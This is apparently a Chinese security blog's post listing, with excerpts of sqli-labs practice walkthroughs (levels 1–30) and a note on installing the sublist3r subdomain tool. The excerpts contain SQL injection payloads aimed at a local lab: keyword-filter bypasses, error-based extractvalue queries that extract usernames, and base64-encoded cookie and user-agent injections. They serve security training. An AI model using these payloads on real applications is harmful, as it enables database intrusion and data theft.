- 博客(7)
- 收藏
- 关注
RSS订阅原创 sqli-labs靶场实战25-30题
Less-25 过滤or和and,过滤方式是将其替换为空,使用双重字符可绕过,如oorr,anandd。 单引号注入判断 http://127.0.0.1/sql/Less-25/?id=1' anandd 1=2 -- - 异常 http://127.0.0.1/sql/Less-25/?id=1' anandd 1=1 -- - 登录成功 报错注入 http://127.0.0.1/sql/Less-25/?id=1' anandd update...
2022-02-28 18:58:11
4057
原创 SQLI-LIBS靶场23-24 #过滤以及二次注入实战
Less-23 Get型单引号报错注入 输入过滤了-- # 并替代成空,故采用单引号闭合 http://127.0.0.1/sql/Less-23/?id=1' and 1='1 直接搜索已知的数据,成功 http://127.0.0.1/sql/Less-23/?id=1' and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) and 1='1 Le...
2021-11-03 16:31:54
353
原创 SQLI-LIBS靶场21-22 cookie base64加密实战
Less-21 Cookie处单引号+)注入,base64编码 Cookie:uname= YWRtaW4nKSM= 绕过了 直接搜索前面获取的信息,成功 admin') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))# YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGV...
2021-09-28 16:05:30
214
原创 SQLI-LIBS POST型特殊位置注入18-20题实战
目录 Less-18 Less-19 Less-20 Less-18 单引号user-agent注入判断 根据报错构造 1',1,1)# 验证成功 1',1,1‘)# 报错 说明构造的闭合语句成立 构造后语句如下 INSEERT INTO table VALUES('1' ,1,1)#','Ip','Username'),成功绕过 使用报错注入,直接检索前面获取的信息 1',1,extractvalue(1,concat...
2021-09-24 15:58:55
992
原创 SQLI-LIBS POST型注入11-17题实战
目录 Less-11 less-12 Less-13 Less-14 Less-15 Less-16 Less-17 Less-11 POST ‘单引号注入 判断显示位 uname=&passwd=' union select 1,2 -- - 确认显示位为1和2 数据库名和数据库用户 uname=&passwd=' union select user(),database()-- - security和root@local...
2021-09-23 15:50:13
349
原创 SQLI_LIBS靶场搭建与1-10GET型注入实战
靶场搭建与1-10GET型注入实战 目录 靶场搭建与1-10GET型注入实战 环境准备 靶场环境初始化 Less-1 Less-2 Less-3 Less-4 Less-5 Less-6 Less-7 Less-8 Less-9 Less-10 环境准备 下载phpstudy https://www.xp.cn/ 下载sqli-labs靶场环境 https://github.com/Audi-1/sqli-labs 运行phpstudy环境,开启apache和mysq
2021-09-03 16:55:07
595
原创 kali中安装使用sublist3r
目录 前言 1.下载sublist3r 2.查看下载的包内容 3.安装必要组件 4.安装工具 5.运行工具 6.运行效果 7.参数说明 前言 sublist3r是一款基于python的子域名捕捉工具,该工具可以利用多种搜索引擎的API,如Google、Bing、Baidu和ASK,也可以在NetCraft、Virustotal、ThreatCrowd、DNSdumpster和reverseDNS中搜索,还可以利用特定词库实施暴力破解。 本文记录了自己在kali中安装sublis..
2021-08-16 17:19:13
6788
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人